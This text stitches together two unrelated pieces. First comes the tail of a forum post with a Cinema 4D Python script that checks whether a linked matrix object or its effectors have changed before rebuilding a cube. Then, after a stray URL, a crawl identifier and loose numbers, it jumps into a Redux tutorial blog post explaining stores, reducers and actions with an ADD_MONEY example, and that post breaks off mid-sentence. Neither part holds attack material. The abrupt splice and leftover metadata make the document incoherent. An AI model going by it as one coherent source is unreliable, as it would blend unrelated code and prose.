op.BaseContainer :param obj: The BaseList2D to retrieve the dirty state from. :param uuid: The uuid used to store in the BaseContainer. :param flag: The dirtiness flag to check for. :return: True if the object is dirty, False otherwise. """ def GetBc(): """ Retrieves a BC stored in the object BC, or create it if it does not exist yet :return: A BaseContainer where value can be stored. """ bcId = 100001 # Make sure to obtain an UNIQUE ID in plugincafe.com bc = op.GetDataInstance().GetContainerInstance(bcId) if bc is None: op.GetDataInstance().SetContainer(bcId, c4d.BaseContainer()) bc = op.GetDataInstance().GetContainerInstance(bcId) if bc is None: raise RuntimeError("Unable to create BaseContainer") return bc # Retrieves the stored value and the true DirtyCount storedDirtyCount = GetBc().GetInt32(uuid, -1) dirtyCount = obj.GetDirty(flag) # Compares them, update stored value and return if storedDirtyCount != dirtyCount: GetBc().SetInt32(uuid, dirtyCount) return True return False def main(): # Retrieve attached object and check if it's a matrix object matrixObj = op[c4d.ID_USERDATA, 1] if matrixObj is None or not matrixObj.CheckType(1018545): return c4d.BaseObject(c4d.Onull) # Retrieve the current cache opCache = op.GetCache() # We need a new object if one of the next reason are False # The Cache is not valid # The Parameter or Matrix of the current generator changed # The Parameter or Matrix of the linked Matrix changed needNewObj = opCache is None needNewObj |= not opCache.IsAlive() needNewObj |= op.IsDirty(c4d.DIRTYFLAGS_DATA | c4d.DIRTYFLAGS_MATRIX) needNewObj |= CheckDirtyObj(matrixObj, 0, c4d.DIRTYFLAGS_DATA | c4d.DIRTYFLAGS_MATRIX) # The Parameter or Matrix of effectors of the linked Matrix changed objList = matrixObj[c4d.ID_MG_MOTIONGENERATOR_EFFECTORLIST] for objIndex in xrange(objList.GetObjectCount()): # If the effector is disabled in the effector list, skip it if not objList.GetFlags(objIndex): continue # If the effector is not valid or not enabled, skip it obj = objList.ObjectFromIndex(op.GetDocument(), objIndex) if obj is None or not obj.IsAlive() or not obj.GetDeformMode(): continue # Check for the dirty value stored (+1 because we already used ID 0 for the matrix object) needNewObj |= CheckDirtyObj(obj, objIndex + 1, c4d.DIRTYFLAGS_DATA | c4d.DIRTYFLAGS_MATRIX) if not needNewObj: print "Old Obj" return opCache print "Generated New Object" return c4d.BaseObject(c4d.Ocube) Cheers, Maxime.
https://plugincafe.maxon.net/topic/11955/python-tag-matrix-is-always-dirty-or-vice-versa/1
CC-MAIN-2021-43
refinedweb
1,547
58.08
One of the most exciting features of Silverlight 2.0 (beta 1) is the ability to create custom panels - just like WPF! Silverlight 2.0 (beta 1) comes with three panels: Canvas, Grid, and StackPanel. Many people will miss other popular panels already included with WPF. This article shows how to build a simple WrapPanel using the extensibility features available with Silverlight 2.0. A custom panel in Silverlight (and WPF) contains two important parts: Measure and Arrange. This is a two-pass recursive system. The first round measures the size of all children in the panel. In a recursive manner, all children in turn measure the size of their children, and so on. In the next round, the children of the panel are arranged using whatever algorithm you like. For a complete description of building a custom panel, see this MSDN article. The first important aspect of the custom WrapPanel is to inherit from Panel. Panel is an abstract class from which all panels must derive. The Orientation dependency property determines whether WrapPanel flows vertically or horizontally. public class WrapPanel : Panel { public Orientation Orientation { get { return (Orientation)GetValue(OrientationProperty); } set { SetValue(OrientationProperty, value); } } public static readonly DependencyProperty OrientationProperty = DependencyProperty.Register("Orientation", typeof(Orientation), typeof(WrapPanel), null); public WrapPanel() { // default orientation Orientation = Orientation.Horizontal; } Next, we must override the Measure function. The input parameter ' availableableSize' to MeasureOverride tells the panel how much size it has to work with. This size is given to the panel by its parent. The most important aspect in measuring each child is to indicate to each child their allowed size. In this simple example, we are just saying to each child that they can have the whole space of the panel. The result of the measuring yields a ' DesiredSize' for each child - this desired size will be used when arranging the children. protected override Size MeasureOverride(Size availableSize) { foreach (UIElement child in Children) { child.Measure(new Size(availableSize.Width, availableSize.Height)); } return base.MeasureOverride(availableSize); } Finally, we must override the Arrange method. Here, we will position each child in the panel. In our case, we position items either horizontally or vertically. In the horizontal case, we arrange the children (left to right) until the right edge of the panel is reached; then, we move to the next line and continue laying out the children (left to right). protected override Size ArrangeOverride(Size finalSize) { Point point = new Point(0; largestHeight = 0.0; } } i++; } }; largestWidth = 0.0; } } i++; } } return base.ArrangeOverride(finalSize); } } } Note, the WrapPanel provided here functions mostly like the WPF WrapPanel. I noticed some minor differences, but have not had time to fix. Feel free to send along your suggested changes. General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/silverlight/WrapPanelSilverlight.aspx
crawl-002
refinedweb
453
50.63
AWS Storage Blog Making it even simpler to get started with Amazon EFS Today, we launched a significant update to the Amazon EFS management console. In this post, I talk about some of the new capabilities in the console, what you can do with them, and how they make it even easier for you to create and manage your EFS resources. Console overview Our main focus with this console update is to make it even easier for customers to get started using Amazon EFS and take advantage of best practices and recommendations. The new landing page displays information about EFS, including pricing, its benefits, services that EFS integrates with (like AWS Fargate and AWS Lambda), and how to get started. The following screenshot provides a first look at the updated EFS console. Getting started quickly Speaking of getting started, we’ve streamlined the experience for creating a new file system so you can get up and running more quickly, in as little as two clicks. When you choose Create file system, you are prompted to provide a name and select a virtual private cloud (VPC). You can then choose to create the file system with just these inputs, or you can customize your settings using a ‘wizard’ workflow you may already be used to. If you choose to create your file system from here, we automatically apply our default and recommended settings. We create a mount target in each Availability Zone in the AWS Region, so you can access your file system from any client in your VPC. We also apply the default security group to each mount target. Keep in mind that you can always change your VPC and mount target security groups later. Your file system is created with the following configuration: - General Purpose performance mode - Bursting Throughput mode - 30-day lifecycle management policy - Encryption at rest enabled using your default AWS managed KMS key for Amazon EFS (aws/elasticfilesystem) - Automatic backup enabled using AWS Backup You can also choose Customize to configure each setting, in which case you are brought to the full wizard workflow. In the wizard, you can apply tags to your file system, change your performance or throughput mode, use a different KMS key to protect your file system, and configure IAM authorization rules for your Network File System (NFS) clients. Automatic backups Another EFS feature we’ve recently launched (both in our console and API) is the ability to automatically add extra data protection for your file system using AWS Backup. We launched native EFS file system backup and restore when AWS Backup launched in January, 2019. AWS Backup is great for easily centrally managing your backups across many resources and AWS services. Previously, if you wanted to back up your EFS file system, you would use the AWS Backup console or API to create a backup plan. You would configure that plan so that your file system was in scope either using your file system ID or file system tags. That workflow is of course still supported, but for users who may not be centrally managing backups across a variety of services, we’ve made it even easier to enable backup for your file systems. It’s now as simple as either a check box in the console or a single API call. For any file system you choose to enable automatic backups for, AWS Backup uses a shared backup plan and stores them in a unique backup vault that is automatically created on your behalf. By default, your file systems are backed up daily, and recovery points are stored with a 35-day retention policy. You can customize the rules for your backup plan inside AWS Backup, and you can enable or disable automatic backups for your file systems at any time. File systems summary If you’ve managed Amazon EFS file systems before, you’re probably used to looking at your inventory in a tabular summary view. With the new console, we’ve enhanced this view in a number of ways. We’ve added a search bar that lets you filter your file systems based on specific criteria, including encryption being enabled, the amount of throughput provisioned, tags, and creation date. We’ve also added an option for you to customize which attributes appear in your view. Using the gearbox in the top-right corner of the preceding screenshot, you can select which properties you want to view and which you want to hide. You can also configure preferences for page size and line wrapping, and we plan to add additional fields that you can customize over time. File system detail Let’s say you want to view additional details or change settings on one of your file systems. Here, I’ve drilled into the one I named “test-fs.” The improved and simple presentation includes an added tabset, similar to other AWS service consoles, that groups information and functionality. In the bottom half of the screen, you can view your storage capacity broken down by storage class in the Metered size tab. We added a visual representation to help you quickly glean how much of your storage is in EFS Standard vs. EFS Infrequent Access. We also added a Monitoring tab that helps you understand your file system’s behavior using Amazon CloudWatch (more on monitoring later in this post). You can configure access control and permissions for your file system using the File system policy and Access points tabs. For example, you can add a policy that requires a specific IAM identity access your file system using a given Access Point. Additionally, if you want to configure your Amazon EFS mount targets or switch which VPC your file system is presented in, you can do so in the Network tab. Last, we made it easier to attach your file system to a given client from within the Amazon EFS console. You may already be familiar with attaching an EFS file system to an EC2 instance while you’re launching a file system. In the new EFS console, we made it simpler for you to grab the mount command you need to mount the file system to your clients. By choosing Attach at the top of the file system detail screen, you can add our recommended mount command to your clipboard with the click of a button. If you’re not using the Amazon-provided DNS, you can select Mount via IP and pick your Availability Zone to get a mount command specific for your clients in that Availability Zone. Access Points We’ve also revamped the workflows for Amazon EFS Access Points. Access points simplify managing application access at scale to your Amazon EFS file systems. Using an access point, you can choose to enforce an operating system (POSIX) identity to all connections, which is particularly useful for serverless and containerized workloads. You can also use access points to isolate application namespaces from each other using virtual root directories. Furthermore, you can craft file system IAM policies that govern which IAM identities are permitted to use your file system and its access points, and with which permissions. In the console, you now have an Access points-specific view for managing access points across your file systems. Understanding file system behavior with CloudWatch One of the more substantial capabilities we’ve added to our new console is the ability to monitor CloudWatch metrics natively. Like the file system summary, you can customize which metrics you prefer to display by default, using the gearbox in the top-right hand side of the section. We’ve also included the notion of throughput utilization. Throughput utilization uses metric math to compute how much throughput your file system is consuming against its limit, no matter if you’re in Bursting Throughput mode or using Provisioned Throughput. This derived metric has been available in our open-source monitoring tutorial on GitHub, but we’ve now embedded it natively in our console. Additionally, if you have any CloudWatch alarms configured against your CloudWatch metrics for your file systems, we put them in context by superimposing them on the metric graph. You can also change the time window over which you’re analyzing your data. Toggle to a Single Value view to get a numerical representation of the most recent data points, or hop over into the CloudWatch console for more advanced capabilities. Let us know what you think! We’re really excited to release these updates to the Amazon EFS console and help benefit our customers. Based on early feedback we’ve gotten so far, we know that we’ve made EFS even easier to use, and we have more ideas on how to continue doing so. We hope this overview provides a useful primer of the things you can do with the new console. At AWS, 95% of our roadmap is directly driven from customer feedback, so please share ideas and requests you have on our new console or on Amazon EFS in the comments section. And of course, give it a spin in the Amazon EFS console.
https://aws.amazon.com/blogs/storage/making-it-even-simpler-to-get-started-with-amazon-efs/
CC-MAIN-2022-40
refinedweb
1,514
56.79
#include <win32_child.hpp> The win32_child class implements the Child concept in a Windows operating system. A Windows child differs from a regular child (represented by a child object) in that it holds additional information about a process. Aside from the standard handle, it also includes a handle to the process' main thread, together with identifiers to both entities. This class is built on top of the generic child so as to allow its trivial adoption. When a program is changed to use the Windows-specific context (win32_context), it will most certainly need to migrate its use of the child class to win32_child. Doing so is only a matter of redefining the appropriate object and later using the required extra features: there should be no need to modify the existing code (e.g. method calls) in any other way. Constructs a new Windows child object representing a just spawned child process. Creates a new child object that represents the process described by the pi structure. The fhstdin, fhstdout and fhstderr parameters hold the communication streams used to interact with the child process if the launcher configured redirections. See the parent class' constructor for more details on these. Returns the primary thread's handle. Returns a handle to the primary thread of the new process. This is the value of the hThread field in the PROCESS_INFORMATION structure returned by CreateProcess(). Returns the primary thread's identifier. Returns a system-wide value that identifies the process's primary thread. This is the value of the dwThreadId field in the PROCESS_INFORMATION structure returned by CreateProcess().
http://www.highscore.de/boost/process/reference/classboost_1_1process_1_1win32__child.html
CC-MAIN-2018-05
refinedweb
261
56.35
Server framework for Deno Server framework for Deno Pogo is an easy-to-use, safe, and expressive framework for writing web servers and applications. It is inspired by hapi. Supports Deno v1.2.0 and higher. Save the code below to a file named server.jsand run it with a command like deno run --allow-net server.js. Then visit in your browser and you should see "Hello, world!" on the page. import pogo from ''; const server = pogo.server({ port : 3000 }); server.router.get('/', () => { return 'Hello, world!'; }); server.start(); The examples that follow will build on this to add more capabilities to the server. Some advanced features may require additional permission flags or different file extensions. If you get stuck or need more concrete examples, be sure to check out the example projects. A route matches an incoming request to a handler function that creates a response Adding routes is easy, just call server.route()and pass it a single route or an array of routes. You can call server.route()multiple times. You can even chain calls to server.route(), because it returns the server instance. Add routes in any order you want to, it's safe! Pogo orders them internally by specificity, such that their order of precedence is stable and predictable and avoids ambiguity or conflicts. server.route({ method : 'GET', path : '/hi', handler : () => 'Hello!' }); server.route({ method : 'GET', path : '/bye', handler : () => 'Goodbye!' }); server .route({ method : 'GET', path : '/hi', handler : () => 'Hello!' }); .route({ method : 'GET', path : '/bye', handler : () => 'Goodbye!' }); server.route([ { method : 'GET', path : '/hi', handler : () => 'Hello!' }, { method : 'GET', path : '/bye', handler : () => 'Goodbye!' } ]); You can also configure the route to handle multiple methods by using an array, or '*'to handle all possible methods. server.route({ method : ['GET', 'POST'], path : '/hi', handler : () => 'Hello!' }); server.route({ method : '*', path : '/hi', handler : () => 'Hello!' }); h.directory()(recommended) h.directory()to send any file within a directory based on the request path. server.router.get('/movies/{file*}', (request, h) => { return h.directory('movies'); }); h.file() h.file()to send a specific file. It will read the file, wrap the contents in a Response, and automatically set the correct Content-Typeheader. It also has a security feature that prevents path traversal attacks, so it is safe to set the path dynamically (e.g. based on the request URL). server.router.get('/', (request, h) => { return h.file('dogs.jpg'); }); If you need more control over how the file is read, there are also more low level ways to send a file, as shown below. However, you'll need to set the content type manually. Also, be sure to not set the path based on an untrusted source, otherwise you may create a path traversal vulnerability. As always, but especially when using any of these low level approaches, we strongly recommend setting Deno's read permission to a particular file or directory, e.g. --allow-read='.', to limit the risk of such attacks. Using Deno.readFile()to get the data as an array of bytes: server.router.get('/', async (request, h) => { const buffer = await Deno.readFile('./dogs.jpg'); return h.response(buffer).type('image/jpeg'); }); Using Deno.open()to get the data as a stream to improve latency and memory usage: server.router.get('/', async (request, h) => { const stream = await Deno.open('./dogs.jpg'); return h.response(stream).type('image/jpeg'); }); JSX is a shorthand syntax for JavaScript that looks like HTML and is useful for constructing web pages You can do webpage templating with React inside of route handlers, using either JSX or React.createElement(). Pogo automatically renders React elements using ReactDOMServer.renderToStaticMarkup()and sends the response as HTML. Save the code below to a file named server.jsxand run it with a command like deno --allow-net server.jsx. The .jsxextension is important, as it tells Deno to compile the JSX syntax. You can also use TypeScript by using .tsxinstead of .jsx, in which case you should add an // @deno-typescomment to load the type definitions for React (see deno_types). import React from ''; import pogo from ''; const server = pogo.server({ port : 3000 }); server.router.get('/', () => { return Hello, world!; }); server.start(); When it comes time to write tests for your app, Pogo has you covered with server.inject(). By injecting a request into the server directly, we can completely avoid the need to listen on an available port, make HTTP connections, and all of the problems and complexity that come along with that. You should focus on writing your application logic and server.inject()makes that easier. The server still processes the request using the same code paths that a normal HTTP request goes through, so you can rest assured that your tests are meaningful and realistic. const response = await server.inject({ method : 'GET', url : '/users' }); pogo.server(options) pogo.router(options?) server.inject(request) server.route(route, options?, handler?) server.router server.start() server.stop() request.body request.headers request.host request.hostname request.href request.method request.origin request.params request.path request.raw request.referrer request.response request.route request.search request.searchParams request.server request.state request.url response.body response.code(statusCode) response.created(url?) response.header(name, value) response.headers response.location(url) response.permanent() response.redirect(url) response.rewritable(isRewritable?) response.state(name, value) response.status response.temporary() response.type(mediaType) response.unstate(name) h.directory(path, options?) h.file(path, options?) h.redirect(url) h.response(body?) router.add(route, options?, handler?) router.all(route, options?, handler?) router.delete(route, options?, handler?) router.get(route, options?, handler?) router.lookup(method, path) router.patch(route, options?, handler?) router.post(route, options?, handler?) router.put(route, options?, handler?) router.routes Serverinstance, which can then be used to add routes and start listening for requests. const server = pogo.server(); Type: object Type: function Optional route handler to be used as a fallback for requests that do not match any other route. This overrides the default 404 Not Found behavior built into the framework. Shortcut for server.router.all('/{catchAll*}', catchAll). const server = pogo.server({ catchAll(request, h) { return h.response('the void').code(404); } }); Type: string\ Example: '/path/to/file.cert' Optional filepath to an X.509 public key certificate for the server to read when server.start()is called, in order to set up HTTPS. Requires the use of the keyFileoption. Type: string\ Default: 'localhost' Optional domain or IP address for the server to listen on when server.start()is called. Use '0.0.0.0'to listen on all available addresses, as mentioned in the security documentation. Type: string\ Example: '/path/to/file.key' Optional filepath to a private key for the server to read when server.start()is called, in order to set up HTTPS. Requires the use of the certFileoption. Type: number\ Example: 3000 0to 65535) for the server to listen on when server.start()is called. Use 0to listen on an available port assigned by the operating system. Routerinstance, which can then be used to add routes. const router = pogo.router(); The serverobject returned by pogo.server()represents your web server. When you start the server, it begins listening for HTTP requests, processes those requests when they are received, and makes the content within each request available to the route handlers that you specify. Performs a request directly to the server without using the network. Useful when writing tests, to avoid conflicts from multiple servers trying to listen on the same port number. Returns a Promisefor a Responseinstance. const response = await server.inject({ method : 'GET', url : '/' }); Type: object Type: string\ Example: 'GET' Any valid HTTP method, such as GETor POST. Used to lookup the route handler. Type: string\ Example: '/' Any valid URL path. Used to lookup the route handler. Adds a route to the server so that the server knows how to respond to requests that match the given HTTP method and URL path. Shortcut for server.router.add(). Returns the server so other methods can be chained. server.route({ method : 'GET', path : '/', handler : () => 'Hello, World!' }); server.route({ method : 'GET', path : '/' }, () => 'Hello, World!'); server.route('/', { method : 'GET' }, () => 'Hello, World!'); Type: object| string| Router| Array Type: string| Array\ Example: 'GET' Any valid HTTP method, array of methods, or '*'to match all methods. Used to limit which requests will trigger the route handler. Type: string\ Example: '/users/{userId}' Any valid URL path. Used to limit which requests will trigger the route handler. Supports path parameters with dynamic values, which can be accessed in the handler as request.params. Type: function requestis a Requestinstance with properties for headers, method, url, and more. his a Response Toolkit instance, which has utility methods for modifying the response. The implementation for the route that handles requests. Called when a request is received that matches the methodand pathspecified in the route options. The handler must return one of: - A string, which will be sent as HTML. - An object, which will be stringified and sent as JSON. - A Uint8Array, which will be sent as-is (raw bytes). - A Response, which will send the response.body, if any. - Any object that implements the Readerinterface, such as a Fileor Buffer. - An Error, which will send an appropriate HTTP error code - returning an error is the same as throwing it. - A Promisefor any of the above types. Content-Typeheader will be set automatically based on the response body before the response is sent. You can use response.type()to override the default behavior. Router The route manager for the server, which contains the routing table for all known routes, as well as various methods for adding routes to the routing table. Begins listening for requests on the hostnameand portspecified in the server options. Returns a Promisethat resolves when the server is listening. await server.start(); console.log('Listening for requests'); Stops accepting new requests. Any existing requests that are being processed will not be interrupted. Returns a Promisethat resolves when the server has stopped listening. await server.stop(); console.log('Stopped listening for requests'); The requestobject passed to route handlers represents an HTTP request that was sent to the server. It is similar to an instance of Deno's ServerRequestclass, with some additions. It provides properties and methods for inspecting the content of the request. Reader To get the body as a string, pass it to Deno.readAll()and decode the result, as shown below. Note that doing so will cause the entire body to be read into memory all at once, which is convenient and fine in most cases, but may be inappropriate for requests with a very large body. server.router.post('/users', async (request) => { const bodyText = new TextDecoder().decode(await Deno.readAll(request.body)); const user = JSON.parse(bodyText); // ... }); If you want more control over how the stream is processed, instead of reading it all into memory, you can read raw bytes from the body in chunks with request.body.read(). It takes a Uint8Arrayas an argument to copy the bytes into and returns a Promisefor either the number of bytes read or nullwhen the body is finished being read. In the example below, we read up to a maximum of 20 bytes from the body. server.router.post('/data', (request) => { const buffer = new Uint8Array(20); const numBytesRead = await request.body.read(buffer); const data = new TextDecoder().decode(buffer.subarray(0, numBytesRead)); // ... }); Headers Contains the HTTP headers that were sent in the request, such as Accept, User-Agent, and others. Type: string\ Example: 'localhost:3000' Hostheader, which is a combination of the hostname and port at which the server received the request, separated by a :colon. Useful for returning different content depending on which URL your visitors use to access the server. Shortcut for request.url.host. To get the hostname, which does not include the port number, see request.hostname. Type: string\ Example: 'localhost' The hostname part of the HTTP Hostheader. That is, the domain or IP address at which the server received the request, without the port number. Useful for returning different content depending on which URL your visitors use to access the server. Shortcut for request.url.hostname. To get the host, which includes the port number, see request.host. Type: string\ Example: '' The full URL associated with the request, represented as a string. Shortcut for request.url.href. To get this value as a parsed object instead, use request.url. Type: string\ Example: 'GET' The HTTP method associated with the request, such as GETor Type: string\ Example: '' The scheme and host parts of the request URL. Shortcut for request.url.origin. Type: object Contains the name/value pairs of path parameters, where each key is a parameter name from the route path and the value is the corresponding part of the request path. Shortcut for request.route.params. Type: string\ Example: /page.html The path part of the request URL, excluding the query. Shortcut for request.url.pathname. ServerRequest The original request object from Deno's httpmodule, upon which many of the other request properties are based. You probably don't need this. It is provided as an escape hatch, but using it is not recommended. Type: string Refererheader, which is useful for determining where the request came from. However, not all user agents send a referrer and the value can be influenced by various mechanisms, such as Referrer-Policy. As such, it is recommended to use the referrer as a hint, rather than relying on it directly. Note that this property uses the correct spelling of "referrer", unlike the header. It will be an empty string if the header is missing. Response The response that will be sent for the request. To create a new response, see h.response(). Type: object The route that is handling the request, as given to server.route(), with the following additional properties: - paramNamesis an array of path parameter names - paramsis an object with properties for each path parameter, where the key is the parameter name, and the value is the corresponding part of the request path - segmentsis an array of path parts, as in the values separated by /slashes in the route path Type: string\ Example: '?query' The query part of the request URL, represented as a string. Shortcut for request.url.search. To get this value as a parsed object instead, use request.searchParams. URLSearchParams The query part of the request URL, represented as an object that has methods for working with the query parameters. Shortcut for request.url.searchParams. To get this value as a string instead, use request.search. Server The server that is handling the request. Type: object Contains the name/value pairs of the HTTP Cookieheader, which is useful for keeping track of state across requests, e.g. to keep a user logged in. URL The full URL associated with the request, represented as an object that contains properties for various parts of the URL, To get this value as a string instead, use request.href. In some cases, the URL object itself can be used as if it were a string, because it has a smart .toString()method. The responseobject represents an HTTP response to the associated requestthat is passed to route handlers. You can access it as request.responseor create a new response with the Response Toolkit by calling h.response(). It has utility methods that make it easy to modify the headers, status code, and other attributes. Type: string| object| Uint8Array| Reader The body that will be sent in the response. Can be updated by returning a value from the route handler or by creating a new response with h.response()and giving it a value. Sets the response status code. When possible, it is better to use a more specific method instead, such as response.created()or response.redirect(). Returns the response so other methods can be chained. statusconstants to define the status code. import { Status as status } from ''; const handler = (request, h) => { return h.response().code(status.Teapot); }; Sets the response status to 201 Createdand sets the Locationheader to the value of url, if provided. Returns the response so other methods can be chained. Sets a response header. Always replaces any existing header of the same name. Headers are case insensitive. Returns the response so other methods can be chained. Headers Contains the HTTP headers that will be sent in the response, such as Location, Vary, and others. Locationheader on the response to the value of url. When possible, it is better to use a more specific method instead, such as response.created()or response.redirect(). Returns the response so other methods can be chained. Only available after calling the response.redirect()method. Sets the response status to 301 Moved Permanentlyor 308 Permanent Redirectbased on whether the existing status is considered rewritable (see "method handling" on Redirections in HTTP for details). Returns the response so other methods can be chained. Sets the response status to 302 Foundand sets the Locationheader to the value of url. Also causes some new response methods to become available for customizing the redirect behavior: response.permanent() response.temporary() response.rewritable() Returns the response so other methods can be chained. Only available after calling the response.redirect()method. Sets the response status to 301 Moved Permanentlyor 302 Foundbased on whether the existing status is a permanent or temporary redirect code. If isRewritableis false, then the response status will be set to 307 Temporary Redirector 308 Permanent Redirect. Returns the response so other methods can be chained. Set-Cookieheader to create a cookie with the given nameand value. Cookie options can be specified by using an object for value. See Deno's cookie interface for the available options. Returns the response so other methods can be chained. All of the following forms are supported: response.state('color', 'blue'); response.state('color', { value : 'blue' }); response.state({ name : 'color', value : 'blue' }); Type: number\ Example: 418 The status code that will be sent in the response. Defaults to 200, which means the request succeeded. 4xx and 5xx codes indicate an error. Only available after calling the response.redirect()method. Sets the response status to 302 Foundor 307 Temporary Redirectbased on whether the existing status is considered rewritable (see "method handling" on Redirections in HTTP for details). Returns the response so other methods can be chained. Content-Typeheader on the response to the value of mediaType. Overrides the media type that is set automatically by the framework. Returns the response so other methods can be chained. Set-Cookieheader to clear the cookie given by name. Returns the response so other methods can be chained. The response toolkit is an object that is passed to route handlers, with utility methods that make it easy to modify the response. For example, you can use it to set headers or a status code. By convention, this object is assigned to a variable named hin code examples. Creates a new response with a body containing the contents of the directory or file specified by path. Returns a Promisefor the response. server.router.get('/movies/{file*}', (request, h) => { return h.directory('movies'); }); The directory or file that is served is determined by joining the path given to h.directory()with the value of the last path parameter of the route, if any. This allows you to control whether the directory root or files within it will be accessible, by using a particular type of path parameter or lack thereof. path: '/movies'will only serve the directory itself, meaning it will only work if the listingoption is enabled (or if the path given to h.directory()is actually a file instead of a directory), otherwise a 403 Forbiddenerror will be thrown. path: '/movies/{file}'will only serve the directory's children, meaning that a request to /movies/will return a 404 Not Found, even if the listingoption is enabled. path: '/movies/{file?}'will serve the directory itself and the directory's children, but not any of the directory's grandchildren or deeper descendants. path: '/movies/{file*}'will serve the directory itself and any of the directory's descendants, including children and granchildren. Note that the name of the path parameter ( filein the example above) does not matter, it can be anything, and the name itself won't affect the directory helper or the response in any way. You should consider it a form of documentation and choose a name that is appropriate and intuitive for your use case. By convention, we usually name it file. Type: object Type: boolean\ Default: false If true, enables directory listings, so that when the request path matches a directory (as opposed to a file), the response will be an HTML page that shows some info about the directory's children. including file names, file sizes, and timestamps for when the files were created and modified. By default, directory listings are disabled for improved privacy, and instead a 403 Forbiddenerror will be thrown when the request matches a directory. Note that this option does not affect which files within the directory are accessible. For example, with a route of /movies/{file*}and listing: false, the user could still access /movies/secret.movif they knew (or were able to guess) that such a file exists. Conversely, with a route of /moviesand listing: true, the user would be unable to access /movies/secret.movor see its contents, but they could see that it exists in the directory listing. To control which files are accessible, you can change the route path parameter or use h.file()to serve specific files. Creates a new response with a body containing the contents of the file specified by path. Automatically sets the Content-Typeheader based on the file extension. Returns a Promisefor the response. server.router.get('/', (request, h) => { return h.file('index.html'); }); Type: object Type: boolean| string\ Default: Deno.cwd()(current working directory) Optional directory path used to limit which files are allowed to be accessed, which is important in case the file path comes from an untrusted source, such as the request URL. Any file inside of the confinedirectory will be accessible, but attempting to access any file outside of the confinedirectory will throw a 403 Forbiddenerror. Set to falseto disable this security feature. Creates a new response with a redirect status. Shortcut for h.response().redirect(url). See response.redirect()for details. Returns the response so other methods can be chained. Creates a new response with an optional body. This is the same as returning the body directly from the route handler, but it is useful in order to begin a chain with other response methods. Returns the response so other methods can be chained. A router is used to store and lookup routes. The server has a built-in router at server.router, which it uses to match an incoming request to a route handler function that generates a response. You can use the server's router directly or you can create a custom router with pogo.router(). To copy routes from one router to another, see router.add(). You can pass a custom router to server.route()or server.router.add()to copy its routes into the server's built-in router, thus making those routes available to incoming requests. Note that you don't necessarily need to create a custom router. You only need to create your own router if you prefer the chaining syntax for defining routes and you want to export the routes from a file that doesn't have access to the server. In other words, a custom router is useful for larger applications. const server = pogo.server(); server.router .get('/', () => { return 'Hello, World!'; }) .get('/status', () => { return 'Everything is swell!'; }); const router = pogo.router() .get('/', () => { return 'Hello, World!'; }) .get('/status', () => { return 'Everything is swell!'; }); const server = pogo.server(); server.route(router); Adds one or more routes to the routing table, which makes them available for lookup, e.g. by a server trying to match an incoming request to a handler function. The routeargument can be: - A route object with optional properties for method, path, and handler- methodis an HTTP method string or array of strings - pathis a URL path string - handleris a function - A string, where it will be used as the path - A Routerinstance, where its routing table will be copied - An array of the above types The optionsargument can be a route object (same as route) or a function, where it will be used as the handler. The handlerfunction can be a property of a routeobject, a property of the optionsobject, or it can be a standalone argument. Each argument has higher precedence than the previous argument, allowing you to pass in a route but override its handler, for example, by simply passing a handler as the final argument. Returns the router so other methods can be chained. const router = pogo.router().add('/', { method : '*' }, () => 'Hello, World!'); router.add(), with '*'as the default HTTP method. Returns the router so other methods can be chained. const router = pogo.router().all('/', () => 'Hello, World!'); router.add(), with 'DELETE'as the default HTTP method. Returns the router so other methods can be chained. const router = pogo.router().delete('/', () => 'Hello, World!'); router.add(), with 'GET'as the default HTTP method. Returns the router so other methods can be chained. const router = pogo.router().get('/', () => 'Hello, World!'); Look up a route that matches the given methodand path. Returns the route object with an additional paramsproperty that contains path parameter names and values. router.add(), with 'PATCH'as the default HTTP method. Returns the router so other methods can be chained. const router = pogo.router().patch('/', () => 'Hello, World!'); router.add(), with 'POST'as the default HTTP method. Returns the router so other methods can be chained. const router = pogo.router().post('/', () => 'Hello, World!'); router.add(), with 'PUT'as the default HTTP method. Returns the router so other methods can be chained. const router = pogo.router().put('/', () => 'Hello, World!'); Type: object The routing table, which contains all of the routes that have been added to the router. See our contributing guidelines for more details. git checkout -b my-new-feature git commit -am 'Add some feature' git push origin my-new-feature Go make something, dang it.
https://xscode.com/sholladay/pogo
CC-MAIN-2021-10
refinedweb
4,348
59.6
Functionally managing state with Redux The Flux application design pattern is still going strong and gaining popularity. There are countless libraries around, helping you implement Flux. But lately, one has been standing out. Redux is definitely the most simple implementation of Flux I have seen so far and it’s very functional too, actually, it’s just a bunch of functions! If you don’t know about Flux yet, you can read my article: Flux, what and why?, or go and Google some Flux… Functions, functions everywhere So what is redux all about? Given, it’s an implementation of Flux. But it looks quite different (all examples will be in ES6). We are going to cover the three basic concepts: the store, reducers and actions. Let’s start with the store. So how do you create one in redux ? import { createStore } from 'redux' let store = createStore(reducer) Yes, just one line (excluding the import). And this is the last store you will need, yes, only one. Your application will have one store with one big object containing you application state. So what is that reducer all about? function reducer(state, action) { //modify state return state } A reducer is a just Javascript function, nothing fancy. It takes the current state and returns the next state! Just pass it to the store, and the store will use that reducer to update it’s state. Pretty simple right? No side effects, no magic. But what will trigger the store to update it’s state? That’s where actions come in to play, they are also just … functions! const ADD_MONEY = 'ADD_MONEY' function addMoney(amount) { return { type: ADD_MONEY, amount: amount } } Again: no side effects, no magic. This action just takes an amount of money and returns an action object. The action object is essentially a message that you send to the store and tells the reducers what to do. The object composition is completely up to you, but following the Flux pattern, at least specify the type of the action. String constants are an easy way to specify types. Now let’s modify our reducer to handle this action: function reducer(state = 0, action) { switch(action.type) { case ADD_MONEY: return state + action.amount default: return state } } So, we start off with a default of 0 money. Then if an action is fired, we check if it is an _ADDMONEY type action. If it is, we return a new state with the money added. If it is not an _ADDMONEY type action we do nothing, we just return the old state. Notice how we don’t modify the old state, this is a very important fact. Always return a new state, never mutate the old state. You could use a library like ImmutableJS to assure this behaviour, or use Object.assign(..) to create a new state every time. So, how do we fire off this action? I mean, we need some money right? store.dispatch(addMoney(1000000)) //1 million! One line, that’s it! addMoney will return an action object of type ADD_MONEY with an amount value of 1000000. The store will pass that action to the reducer, which will determine the new state. This new state is then stored in the store and can be accessed like this: store.getState() // => 1000000 The cycle So to recap. There are three main concepts in redux. The store, actions and reducers. Actions trigger state changes, the store holds the state and reducers calculate the next state. Here is a simplified scheme of how the redux cycle works: Actions are triggered by either views, other actions or events/callbacks from, for instance, the server. Getting serious That was pretty cool right? Not a lot of code, no magic, just simple Javascript functions. Notice how we only did one import from redux, just the createStore method. Everything else is plain Javascript. But, especially when you already know Flux, this will raise some questions like:’Only one store, how do I keep code manageble then?‘, ‘How do I wire this up to my views?‘. Well, let’s answer at 